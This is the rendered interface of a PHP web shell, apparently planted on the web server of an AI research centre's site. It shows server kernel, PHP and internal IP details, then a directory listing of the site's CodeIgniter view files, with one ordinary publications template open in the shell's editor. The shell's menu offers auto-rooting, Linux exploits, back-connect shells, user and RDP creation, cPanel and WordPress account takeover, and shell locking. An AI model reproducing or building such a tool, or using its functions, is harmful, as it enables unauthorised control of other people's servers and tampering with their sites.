Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cai /
application /
views /
front /
html /
[ HOME SHELL ]
Name
Size
Permission
Action
02-05-23-publication.php
24.18
KB
-rwxr-x--x
11-05-publication-list.php
5.49
KB
-rwxr-x--x
11-05-publication.php
24.28
KB
-rwxr-x--x
17052023faculty.php
15.96
KB
-rwxr-x--x
170523events.php
13.09
KB
-rwxr-x--x
170523fareas.php
6.96
KB
-rwxr-x--x
170523media.php
7.04
KB
-rwxr-x--x
170523memories.php
9.73
KB
-rwxr-x--x
170523projects.php
14.15
KB
-rwxr-x--x
170523publication.php
4.13
KB
-rwxr-x--x
170523staff.php
15.96
KB
-rwxr-x--x
180624_jobs-content.php
590
B
-rw-r--r--
180624_jobs-list.php
5.95
KB
-rw-r--r--
180624_jobs.php
38.99
KB
-rw-r--r--
30-04-23-jobs.php
55.42
KB
-rwxr-x--x
30-04-23-last-final-contact.ph...
49.29
KB
-rwxr-x--x
con-email.php
12.48
KB
-rwxr-x--x
contact-last.php
20.72
KB
-rwxr-x--x
contact.php
22.35
KB
-rwxr-x--x
courses-content.php
541
B
-rwxr-x--x
courses-list.php
5.95
KB
-rwxr-x--x
courses.php
15.72
KB
-rwxr-x--x
events-content.php
177
B
-rwxr-x--x
events-list.php
8.33
KB
-rwxr-x--x
events.php
13.22
KB
-rwxr-x--x
faculty.php
16.07
KB
-rwxr-x--x
fareas-content.php
596
B
-rwxr-x--x
fareas-list.php
5.54
KB
-rwxr-x--x
fareas.php
6.69
KB
-rwxr-x--x
home.php
14.61
KB
-rwxr-x--x
jobs-content.php
590
B
-rwxr-x--x
jobs-list.php
5.97
KB
-rwxr-x--x
jobs.php
39.16
KB
-rwxr-x--x
media-content.php
613
B
-rwxr-x--x
media-list.php
8.35
KB
-rwxr-x--x
media.php
6.88
KB
-rwxr-x--x
memories.php
9.73
KB
-rwxr-x--x
projects-content.php
177
B
-rwxr-x--x
projects-list.php
8.39
KB
-rwxr-x--x
projects.php
14.48
KB
-rwxr-x--x
publication-content.php
16.73
KB
-rwxr-x--x
publication-list.php
5.63
KB
-rwxr-x--x
publication.php
4.26
KB
-rwxr-x--x
publication25042023.php
130.57
KB
-rwxr-x--x
staff.php
16.05
KB
-rwxr-x--x
workshops-content.php
616
B
-rwxr-x--x
workshops-list.php
8.4
KB
-rwxr-x--x
workshops.php
16.12
KB
-rwxr-x--x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : 11-05-publication.php
<?php defined('BASEPATH') OR exit('No direct script access allowed'); ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Infosys Centre for AI | Home</title> <link href="<?=$this->config->item('fimg_url');?>favicon.ico" rel="icon"> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Lato:ital,wght@0,100;0,300;0,400;0,700;0,900;1,100;1,300;1,400;1,700;1,900&family=Merriweather:ital,wght@0,300;0,400;1,300;1,400&family=Raleway:ital,wght@0,100;0,200;0,300;0,400;0,500;0,600;0,700;0,800;0,900;1,100;1,200;1,300;1,400;1,500;1,600;1,700;1,900&display=swap" rel="stylesheet"> <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.2.0/css/all.min.css" integrity="sha512-xh6O/CkQoPOWDdYTDqeRdPCVd1SpvCA9XXcUnZS2FmJNp1coAFzvtCN9BmamE+4aHK8yyUHUSCcJHgXloTyT2A==" crossorigin="anonymous" referrerpolicy="no-referrer" /> <!-- Link Swiper's CSS --> <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/swiper/swiper-bundle.min.css" /> <link rel="stylesheet" href="<?=$this->config->item('fcss_url');?>main.css"> <link rel="stylesheet" href="<?=$this->config->item('fcss_url');?>home.css"> <link rel="stylesheet" href="<?=$this->config->item('fcss_url');?>inner.css"> <link rel="stylesheet" href="<?=$this->config->item('fcss_url');?>mainv2.css"> <style> .app-header__logo { max-inline-size: 160px; } .app-header { height: 80px; } .app-header__search-area { height: 100px; } .app-header__logo, .app-header__logo img { filter: none !important; } @media screen and (max-width:600px) { .app-header__logo { max-inline-size: 160px; } } </style> </head> <body class="app"> <header class="app-header"><?php $this->load->view($DIR['TOP']);?></header> <?php if($PRSNT_BLK ==BLK_LIST){ ?> <style> .c_button__icon { margin-bottom: 0; } .d-block { display: block; } .w-dyn-list { padding-bottom: 100px; } .text-2xs.font-mono { line-height: 20px; } .text-2xs.font-mono small { font-size: 12px; font-weight: 700; margin-top: 2px; } .c_card_list__category{ align-items: flex-start; gap: 8px; } .c_featured-text__title { padding-top: 83px; } </style> <div class="bg-grey-50"> <div class="c_featured-text__title"> <div class="e_container w-container"> <div class="c_featured-text__title__container"> <div class="c_featured-text__title__content"> <h2 class="text-2xl font-medium text-blue-400 mt-0 mb-5">Publications</h2> </div> </div> </div> </div> </div> <?php /*?><div fs-cmsfilter-element="scroll-anchor" fs-cmsload-element="scroll-anchor" class="bg-white"> <div fs-cmsfilter-element="filters" class="c_page_filter__in_page w-form"> <form id="xxdwf-form-Search-Form" name="wf-form-Search-Form" data-name="Search Form" method="post" class="c_page_filter__in_page__form" aria-label="Search Form"> <div class="c_page_filter__in_page__search"> <div class="e_container w-container"> <div class="c_page_search__in-page"><input type="text" class="c_page_search__in-page__field w-input" maxlength="256" name="Search" fs-cmsfilter-field="*" data-name="Search" placeholder="Search..." id="xxdSearch-3" required=""> <div class="c_page_search__in-page__icon w-embed"><svg class="icon__page_search" width="40" height="40" viewBox="0 0 40 40" fill="none" xmlns="http://www.w3.org/2000/svg"> <path fill-rule="evenodd" clip-rule="evenodd" d="M28.8571 31.8333L23 25L23.7593 24.3492L29.6164 31.1825L28.8571 31.8333Z"></path> <path fill-rule="evenodd" clip-rule="evenodd" d="M18.5 26C22.6421 26 26 22.6421 26 18.5C26 14.3579 22.6421 11 18.5 11C14.3579 11 11 14.3579 11 18.5C11 22.6421 14.3579 26 18.5 26ZM18.5 27C23.1944 27 27 23.1944 27 18.5C27 13.8056 23.1944 10 18.5 10C13.8056 10 10 13.8056 10 18.5C10 23.1944 13.8056 27 18.5 27Z"> </path> </svg> <style type="text/css"> .icon__page_search { fill: currentColor; } </style> </div> </div> </div> </div> <div class="c_page_filter"> <div class="e_container w-container"> <div class="c_page_filter__container"> <div class="c_page_filter__filters"> <div data-delay="0" data-hover="false" class="c_page_filter__dropdown w-dropdown"> <div class="c_page_filter__dropdown__toggle w-dropdown-toggle" id="xxdw-dropdown-toggle-0" aria-controls="w-dropdown-list-0" aria-haspopup="menu" aria-expanded="false" role="button" tabindex="0"> <div class="font-mono text-2xs mr-10">Area</div> <div class="c_page_filter__dropdown__icon w-embed"><svg class="icon__currentColor" width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg"> <path fill-rule="evenodd" clip-rule="evenodd" d="M4 7H4.6H19.6H20.2V8.2H19.6H4.6H4V7ZM7 11H7.6H16.6H17.2V12.2H16.6H7.6H7V11ZM10.6 15H10V16.2H10.6H13.6H14.2V15H13.6H10.6Z"> </path> </svg> <style type="text/css"> .icon__currentColor { fill: currentColor; } </style> </div> </div> <nav class="c_page_filter__dropdown__list w-dropdown-list glscrolling" id="xxdw-dropdown-list-0" aria-labelledby="w-dropdown-toggle-0"> <div class="c_page_filter__dropdown__wrapper w-dyn-list"> <div role="list" class="w-dyn-items"> <?php if(count($aList) > 0) { foreach($aList as $key=>$aVal) { ?> <div role="listitem" class="w-dyn-item"> <label fs-cmsfilter-field="tag" class="w-checkbox c_page_filter__checkbox_field"><input type="checkbox" name="checkbox" id="xxdcheckbox-1" data-name="Checkbox" class="w-checkbox-input c_page_filter__checkbox"><span class="c_page_filter__checkbox_label w-form-label" for="checkbox"><?=$aVal['NAME'];?></span> </label> </div> <?php } } ?> </div> </div> </nav> </div> <div data-delay="0" data-hover="false" class="c_page_filter__dropdown w-dropdown"> <div class="c_page_filter__dropdown__toggle w-dropdown-toggle" id="xxdw-dropdown-toggle-0" aria-controls="w-dropdown-list-0" aria-haspopup="menu" aria-expanded="false" role="button" tabindex="0"> <div class="font-mono text-2xs mr-10">Venue</div> <div class="c_page_filter__dropdown__icon w-embed"><svg class="icon__currentColor" width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg"> <path fill-rule="evenodd" clip-rule="evenodd" d="M4 7H4.6H19.6H20.2V8.2H19.6H4.6H4V7ZM7 11H7.6H16.6H17.2V12.2H16.6H7.6H7V11ZM10.6 15H10V16.2H10.6H13.6H14.2V15H13.6H10.6Z"> </path> </svg> <style type="text/css"> .icon__currentColor { fill: currentColor; } </style> </div> </div> <nav class="c_page_filter__dropdown__list w-dropdown-list glscrolling" id="xxdw-dropdown-list-0" aria-labelledby="w-dropdown-toggle-0"> <div class="c_page_filter__dropdown__wrapper w-dyn-list"> <div role="list" class="w-dyn-items"> <?php if(count($vList) > 0) { foreach($vList as $key=>$vVal) { ?> <div role="listitem" class="w-dyn-item"> <label fs-cmsfilter-field="tag" class="w-checkbox c_page_filter__checkbox_field"><input type="checkbox" name="checkbox" id="xxdcheckbox-1" data-name="Checkbox" class="w-checkbox-input c_page_filter__checkbox"><span class="c_page_filter__checkbox_label w-form-label" for="checkbox"><?=$vVal['NAME'];?></span> </label> </div> <?php } } ?> </div> </div> </nav> </div> </div> <div class="c_page_filter__reset"> <button type="button" fs-cmsfilter-element="reset" id="xxdresetFilters" class="c_button__icon w-inline-block"> Reset </button> </div> </div> </div> </div> </form> <div class="w-form-done" tabindex="-1" role="region" aria-label="Search Form success"></div> <div class="w-form-fail" tabindex="-1" role="region" aria-label="Search Form failure"></div> </div> </div><?php */?> <!--<div class="bg-grey-50"> <div class="c_card_list pt-50">--> <div class="e_container w-container"> <div class="c_page_filter__in_page__active pb-50"></div> <div class="w-dyn-list" id="RecordList"><?=$cList;?></div> </div> <!-- </div> </div>--> <?php }if($PRSNT_BLK ==BLK_DTLS){ ?> <div class="bg-teal-50"> <div class="c_banner__publication"> <div class="e_container w-container"> <div class="c_banner__publication__container"> <div class="c_banner__publication__text"> <div class="c_banner__publication__category"><img src="<?=$this->config->item('fimg_url');?><?=($Dtls['PBVID']!=2)?'t6.png':'t4.png';?>" loading="lazy" alt="Paper" class="rounded-full mr-10" width="40" height="40"> <div class="font-mono text-2xs text-blue-400"><?=($Dtls['PBVID']!=2)?'Conference':'Journal';?></div> </div> <div class="c_banner__publication__title"> <div class="font-medium text-2xl text-blue-400"><?=$Dtls['NAME'];?></div> </div> </div> </div> </div> </div> </div> <div class="bg-white"> <div class="c_cms_content__container"> <div class="e_container w-container"> <div class="c_rich-text__cms w-richtext"> <h4><?=$Dtls['SDESC'];?></h4> <p><?=$Dtls['LDESC'];?></p> </div> </div> </div> <div class="c_cms_content__meta__container w-condition-invisible"> <div class="c_cms_content__meta__wrapper"> <div class="c_cms_content__meta__layout"> <div class="text-2xs text-grey-700 mb-5">Notes</div> <div class="c_rich-text__cms mb-15 w-dyn-bind-empty w-richtext"></div> </div> </div> </div> <div class="c_cms_content__meta__container w-condition-invisible"> <div class="c_cms_content__meta__wrapper"> <div class="text-2xs text-grey-700 mb-5">Authors</div> <div class="w-dyn-bind-empty"></div> <div class="text-2xs text-grey-700 mb-5 mt-10 w-condition-invisible">* External authors</div> </div> </div> <div class="c_cms_content__meta__container"> <div class="c_cms_content__meta__wrapper"> <div class="text-2xs text-grey-700 mb-5">Authors</div> <div><?=$Dtls['PNAME'];?></div> </div> </div> <?php /*?><div class="c_cms_content__meta__container"> <div class="c_cms_content__meta__wrapper"> <div class="text-2xs text-grey-700 mb-5">Working Area</div> <div><?=$Dtls['AREA'];?></div> </div> </div><?php */?> <?php if($Dtls['PBVID']!=2) { ?> <div class="c_cms_content__meta__container"> <div class="c_cms_content__meta__wrapper"> <div class="text-2xs text-grey-700 mb-5">Venue</div> <div><?=$Dtls['VANUE'];?></div> </div> </div> <?php } ?> <div class="c_cms_content__meta__container"> <div class="c_cms_content__meta__wrapper"> <div class="text-2xs text-grey-700 mb-5">Published</div> <div><?=$Dtls['PMNTH'];?></div> </div> </div> <?php if($Dtls['DFILE']!=''){ ?> <div class="c_cms_content__meta__container"> <div class="c_cms_content__meta__wrapper"> <div class="text-2xs text-grey-700 mb-5">Download</div> <div class="c_cms_content__meta__tags__wrapper w-dyn-list"> <div role="list" class="c_cms_content__meta__tags__list w-dyn-items"> <div role="listitem" class="c_cms_content__meta__tags__item w-dyn-item"><a href="<?=base_url().DIR_PBLP.'/'.$Dtls['DFILE'];?>" class="c_chip__text mt-5 w-inline-block" target="_blank" download> <div class="text-2xs leading-none">Download</div> </a></div> </div> </div> </div> </div> <?php } ?> <div class="c_cms_content__meta__container"> <div class="c_cms_content__meta__wrapper"> <div class="text-2xs text-grey-700 mb-5">Tags</div> <div class="c_cms_content__meta__tags__wrapper w-dyn-list"> <div role="list" class="c_cms_content__meta__tags__list w-dyn-items"> <?php /*?><div role="listitem" class="c_cms_content__meta__tags__item w-dyn-item"><a href="#<?=$Dtls['PNAME'];?>" class="c_chip__text mt-5 w-inline-block"> <div class="text-2xs leading-none"><?=$Dtls['PNAME'];?></div> </a></div><?php */?> <div role="listitem" class="c_cms_content__meta__tags__item w-dyn-item"><a href="#<?=$Dtls['AREA'];?>" class="c_chip__text mt-5 w-inline-block"> <div class="text-2xs leading-none"><?=$Dtls['AREA'];?></div> </a></div> <div role="listitem" class="c_cms_content__meta__tags__item w-dyn-item"><a href="#<?=$Dtls['VANUE'];?>" class="c_chip__text mt-5 w-inline-block"> <div class="text-2xs leading-none"><?=$Dtls['VANUE'];?></div> </a></div> </div> </div> </div> </div> <div class="c_cms_content__meta__container w-condition-invisible"> <div class="c_cms_content__meta__wrapper"> <div class="text-2xs text-grey-700 mb-5">Share</div> <ul role="list" class="c_cms_content__meta__share w-list-unstyled"> <li class="c_blog_content__meta__share_item"> <div class="c_blog_content__meta__share_icon w-embed"><a href="https://twitter.com/intent/tweet?url=https://loremipsum.com#loremipsums-latest-research-at-neurips-2022&text=loremipsum: loremipsum's latest research at NeurIPS 2022" target="_blank"> <svg class="icon__currentColor" width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M21 6.73175C20.3377 7.02575 19.626 7.22375 18.879 7.313C19.6418 6.85625 20.2275 6.1325 20.5027 5.27C19.7895 5.693 18.999 6.0005 18.1575 6.16625C17.4847 5.4485 16.524 5 15.462 5C13.0777 5 11.3258 7.2245 11.8643 9.53375C8.796 9.38 6.075 7.91 4.25325 5.67575C3.28575 7.3355 3.7515 9.50675 5.3955 10.6062C4.791 10.5867 4.221 10.421 3.72375 10.1442C3.68325 11.855 4.9095 13.4555 6.6855 13.8117C6.16575 13.9527 5.5965 13.9857 5.0175 13.8747C5.487 15.3417 6.8505 16.409 8.4675 16.439C6.915 17.6562 4.959 18.2 3 17.969C4.63425 19.0167 6.576 19.628 8.661 19.628C15.5175 19.628 19.3912 13.8372 19.1572 8.6435C19.8787 8.12225 20.505 7.472 21 6.73175V6.73175Z"> </path> </svg> </a> <style type="text/css"> .icon__currentColor { fill: currentColor; } </style> </div> </li> <li class="c_blog_content__meta__share_item"> <div class="c_blog_content__meta__share_icon w-embed"><a href="https://www.facebook.com/sharer/sharer.php?u=https://loremipsum.com#loremipsums-latest-research-at-neurips-2022" target="_blank"> <svg class="icon__currentColor" width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M16.4616 13.0264L16.9863 9.8005H13.7038V7.70803C13.7038 6.82528 14.1615 5.96432 15.6317 5.96432H17.125V3.21796C17.125 3.21796 15.7704 3 14.4759 3C11.7712 3 10.0051 4.54537 10.0051 7.34185V9.8005H7V13.0264H10.0051V20.9603C10.6085 21.0496 11.2257 20.9603 11.8545 20.9603C12.4832 20.9603 13.1004 21.0496 13.7038 20.9603V13.0264H16.4616Z"> </path> </svg> </a> <style type="text/css"> .icon__currentColor { fill: currentColor; } </style> </div> </li> <li class="c_blog_content__meta__share_item"> <div class="c_blog_content__meta__share_icon w-embed"><a href="https://www.linkedin.com/shareArticle?url=https://loremipsum.com#loremipsums-latest-research-at-neurips-2022" target="_blank"> <svg class="icon__currentColor" width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg"> <path d="M7.32 5.66667C7.32 6.58733 6.58 7.33333 5.66667 7.33333C4.75333 7.33333 4.01333 6.58733 4.01333 5.66667C4.01333 4.74667 4.75333 4 5.66667 4C6.58 4 7.32 4.74667 7.32 5.66667ZM7.33333 8.66667H4V19.3333H7.33333V8.66667ZM12.6547 8.66667H9.34267V19.3333H12.6553V13.734C12.6553 10.6207 16.6747 10.366 16.6747 13.734V19.3333H20V12.5793C20 7.326 14.052 7.51733 12.6547 10.1033V8.66667Z"> </path> </svg> </a> <style type="text/css"> .icon__currentColor { fill: currentColor; } </style> </div> </li> </ul> </div> </div> </div> <?php } ?> <footer class="c_site-footer"><?php $this->load->view($DIR['FOOTER']);?></footer> <script src="https://code.jquery.com/jquery-3.6.1.min.js" integrity="sha256-o88AwQnZB+VDvE9tvIXrMQaPlFFSUTR+nldQm1LuPXQ=" crossorigin="anonymous"></script> <script src="assets/js/app.js"></script> <!-- Slider --> <!-- Swiper JS --> <script src="https://cdn.jsdelivr.net/npm/swiper/swiper-bundle.min.js"></script> <!-- Initialize Swiper --> <script> var swiper = new Swiper(".enevtSlider", { slidesPerView: 1, spaceBetween: 30, pagination: { el: ".swiper-pagination", clickable: true, }, breakpoints: { 640: { slidesPerView: 2 }, 768: { slidesPerView: 3 }, }, }); </script> <script> $(document).on("click","#subsId", function(){ $('#subMsgId').html(''); $('#subMsgId').hide(); var subsEmail=$('#subsEmail').val(); if(subsEmail!='') { if((validateEmail(subsEmail))==true) { var request = $.ajax({ url: "<?=site_url(_NSUB_);?>", type: "POST", data: {subsEmail:subsEmail}, dataType: "html" }); request.done(function(msg){ $('#subMsgId').show(); $('#subMsgId').html(msg); }); request.fail(function(jqXHR, textStatus) { alert( "Request failed: " + textStatus ); }); } else { $('#subMsgId').show(); $('#subMsgId').html('Invalid email address'); } } }); $(document).on("input","#subsEmail", function(){ if($(this).val()=='') { $('#subMsgId').html(''); $('#subMsgId').hide(); } }); function validateEmail($email) { var emailReg = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/; return emailReg.test( $email ); } </script> </body> </html>
Close